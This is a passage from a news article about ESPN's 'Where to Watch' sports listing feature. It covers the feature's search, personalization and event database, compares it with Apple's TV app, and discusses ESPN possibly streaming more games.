ESPN’s latest “Where to Watch” feature, debuting today on ESPN.com as well as through the ESPN mobile and streaming device applications, is designed to tackle this issue directly. The feature offers an all-encompassing guide to help you understand where specific sports events can be viewed, slicing through the confusion of assorted streaming services and cable channels.

### Notable Features of “Where to Watch”

1. **Comprehensive Event Listings**: This guide provides various views, including a daily overview of all sporting events. Users can quickly see which games are happening on any given day.

2. **Search Capabilities**: A powerful search function allows users to swiftly find specific games or teams, simplifying the process of pinpointing the desired broadcast.

3. **Personalization Options**: Users can mark their preferred sports or teams, leading to a tailored viewing experience. This allows the most pertinent games to remain prominent.

4. **Extensive Information Hub**: Central to “Where to Watch” is a database of events curated by the ESPN Stats and Information Group (SIG). This database consolidates data from ESPN alongside its partners, encompassing programming details from more than 250 media sources, including both television networks and streaming platforms.

### Advancement Beyond Previous Options

Although ESPN has previously provided browsable game listings, the “Where to Watch” feature takes it further by clarifying where each game is actually viewable. This marks a noteworthy enhancement over past services, which often left viewers uncertain about the service or channel broadcasting a certain game.

Nonetheless, it’s crucial to understand that the guide does not assure access to the requisite services for viewing the games. For example, if a game is exclusively available on a cable channel to which you lack a subscription, you may still find yourself in a tough spot. However, for a vast number of sports enthusiasts, particularly those navigating the increasingly disjointed sports broadcast environment, this guide will serve as a vital resource.

## The Competitive Arena: ESPN vs. Apple

ESPN isn’t the first to tackle this challenge. Apple has made notable progress in this domain with its TV app, originally intended as an all-in-one destination for nearly all streaming video. Apple’s strategy involved integrating third-party offerings like the MLB app alongside its own, transforming the TV app into a central hub for sports fans.

However, Apple’s initiatives have faced obstacles due to some cable firms’ reluctance to collaborate and the absence of key players like Netflix. While Apple has advanced, especially in specific sports, it hasn’t completely fulfilled its goal of becoming a comprehensive sports viewing platform.

On the other hand, ESPN’s “Where to Watch” feature seems more promising, covering a wider array of games with enhanced search and listing functionality. By concentrating specifically on sports and utilizing its extensive network of collaborations, ESPN may have a competitive advantage in crafting a truly all-encompassing guide for sports aficionados.

## The Future: More Games Streaming Directly in the ESPN App?

Looking to the future, ESPN executives have alluded to the potential for streaming more games directly within the ESPN app. If “Where to Watch” becomes the primary hub for sports fans, ESPN could gain significant leverage with leagues and broadcasters to bring this vision to fruition.

While this could be a boon for viewers in terms of ease of access, it also raises concerns regarding a single entity wielding excessive influence over sports broadcasting. As ESPN broadens its offerings, it will be imperative to observe how this dynamic develops and its implications for the wider sports media landscape.

##

Read More